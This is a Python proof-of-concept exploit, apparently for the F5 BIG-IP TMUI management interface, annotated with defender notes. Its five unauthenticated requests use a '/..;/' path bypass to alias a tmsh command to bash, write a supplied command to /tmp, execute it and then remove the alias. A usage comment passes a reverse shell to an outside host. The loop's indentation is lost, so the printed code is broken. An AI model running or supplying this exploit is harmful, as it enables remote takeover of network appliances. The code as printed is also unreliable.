Python:
import requests
import sys
import random
# Proof-of-concept request chain against a web management interface. The
# /tmui/ paths and tmsh commands match the F5 BIG-IP TMUI.
# NOTE(review): the page names no product, version or advisory -- confirm the
# affected product and fixed release against the vendor advisory.
#
# Every path below starts with /tmui/login.jsp/..;/ -- a "..;" segment placed
# after the login page to reach /tmui/locallb/workspace/*.jsp. The script
# sends no credentials or session cookie with any request.
#
# Defender notes:
#   * Web access logs: request paths containing "/..;/", and hits on
#     tmshCmd.jsp, fileSave.jsp and fileRead.jsp under /tmui/locallb/workspace/.
#   * tmsh audit records: a cli alias named "list" being created and then
#     deleted. The last request removes the alias, so the running
#     configuration will not show it afterwards.
#   * File system: none of the five requests removes /tmp/<8 digits>, so that
#     file may remain as an artefact.
#   * Mitigation: the vendor's fixed release, and keeping the management
#     interface unreachable from untrusted networks.
#
# NOTE(review): the indentation of the loop/try body was lost when the page
# was extracted; the code lines are reproduced as published.
# python exp.py "https://1.2.4.1:22212/" "bash+-i>%26+/dev/tcp/1.1.2.3/23333+0>%261"
# First CLI argument: base URL that each path below is appended to.
ip = sys.argv[1]
# Second CLI argument: inserted unmodified into the content= query parameter
# of the fileSave.jsp request.
cmd = sys.argv[2]
# Eight random decimal digits, used as the file name under /tmp by requests 2-4.
num_str = ''.join(str(random.choice(range(10))) for _ in range(8))
# Request 1: tmsh command that creates a private cli alias "list" pointing at bash.
poc1_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
# Request 2: writes the caller-supplied content to /tmp/<num_str>.
poc2_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content=%s" %(num_str,cmd)
# Request 3: reads /tmp/<num_str> back, which shows whether the write succeeded.
poc3_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/" + num_str
# Request 4: issues "list /tmp/<num_str>" through tmsh. Presumably, with the
# alias from request 1 in place, this hands the saved file to bash -- the
# command-execution step (inferred from the alias definition; not shown here).
poc4_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp%2f" + num_str
# Request 5: deletes the private "list" alias created by request 1.
poc5_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list"
# The list order is the order in which the requests are sent.
poc_lists = [poc1_url,poc2_url,poc3_url,poc4_url, poc5_url]
for poc in poc_lists:
try:
# verify=False disables TLS certificate verification for the request.
# The raw response body (bytes) is printed.
content = requests.get(url=ip+poc, verify=False).content
print(content)
except Exception as e:
# Any error is printed and the loop moves on to the next URL.
print(e)